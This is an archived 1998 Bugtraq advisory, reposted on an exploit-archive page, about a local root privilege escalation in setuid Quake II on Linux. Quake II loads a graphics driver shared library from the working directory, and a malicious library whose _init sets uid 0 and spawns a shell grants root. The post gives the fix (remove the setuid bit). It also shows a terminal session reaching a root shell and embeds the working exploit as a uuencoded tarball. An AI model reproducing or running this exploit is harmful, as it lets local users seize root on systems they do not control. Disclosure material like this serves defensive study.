Quake2 shared library nonsens

Summary
Description:Heh, quake2 is suid root and loads shared libraries from the working directory. This exploit overfloads _init.
Author:kevingeo@CRUZIO.COM
Compromise: root (local)
Vulnerable Systems:Those running a vulnerable version of QuakeII
Date:26 January 1998
Details


Date: Mon, 26 Jan 1998 01:16:37 -0500
From: kevingeo@CRUZIO.COM
To: BUGTRAQ@NETSPACE.ORG
Subject: Quake 2 Linux

Vulnerable:
Anyone who made Quake2 setuid root in order to use the svgalib software refresh.

Solution:
chmod u-s quake2, and use ref_softx instead of ref_soft.
If you prefer console-based video, you could get GGI
(http://synergy.caltech.edu/~ggi/), and use KGI with the SVGAlib wrapper
(I haven't tried this).


Exploit:
Quake2 uses dlopen(3) to load its graphics code (which is in a seperate
shared library).  dlopen calls the _init function (if applicable) before
it returns.  Quake2 allows you to set which refresh driver to use on the
command line, and loads the .so file from the working directory.
The exploit is a shared library with one function; _init.  It sets the uid
and gid to 0, and spawns a shell.


nop@chrome:~/ref_root> id
uid=501(nop) gid=100(users) groups=100(users)
nop@chrome:~/ref_root> make
gcc -O2 -pipe -o ref_root.o -c ref_root.c -fPIC
ld -m elf_i386 -shared -o ref_root.so -soname ref_root
/usr/lib/crtbeginS.o ref_root.o /usr/lib/crtendS.o
nop@chrome:~/ref_root> /usr/games/quake/quake2 +set vid_ref root
couldn't exec default.cfg
couldn't exec config.cfg
Console initialized.
------- Loading ref_root.so -------
sh-2.00#
sh-2.00# id
uid=0(root) gid=0(root) groups=100(users)
sh-2.00#

exploit code follows.
begin 644 ref_root.tgz
M'XL(`/TBS#0``^W534_C,!`&X%[K7_$*+FW5$"<IH2V[7#BL5K`+$N*T0E7J
M3!.+X)1\(!#BOZ_3!5K0"D[E2_-<8L],;"?1*+^B<YKIC%IKY$D9#@9HH2&?
M7:T@#(%P$`;2V[$`3X8R:$&N\U`/ZK**"J!5Y'GU4MUK^4\JRK(Q"II-FN=#
MIJ="/,S&$.U$*3A'/IRYGA.<_+%T*X>CEC-;-3O^N0\A[!+CU2JW+@O7!EU5
M5&3BDV>A*27:V*!H9S&<"U`VF^A@&,(ITZB@^,F>I=VTS$UT0<LC_V^QE_<7
M0KSW6_\XEE]P?7N\VO_;P7W_^](?2-O_GMS9YOY_"VYOV4J=R]K^#7S0]3S+
M==6%RN<WA4Y2FU)=>*/1$`=TI0U^4%XDA)XKQ*8V*JMCPK?:Z+**M]*]E9@-
MV-YK8D*;"A-M=-7IXE9`V?9&KTS_^&>[0L`.Y!F^8\.=:N.6Z<;N(N8UL=^G
MAX?-E*I:QQW9_3=.5L;TF*!K4E?462S7MROT%W?;S!TW/6.,,<888XPQQAAC
3C#'&&&.,,<:^IK\_JS?9`"@``%?4
`
end

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault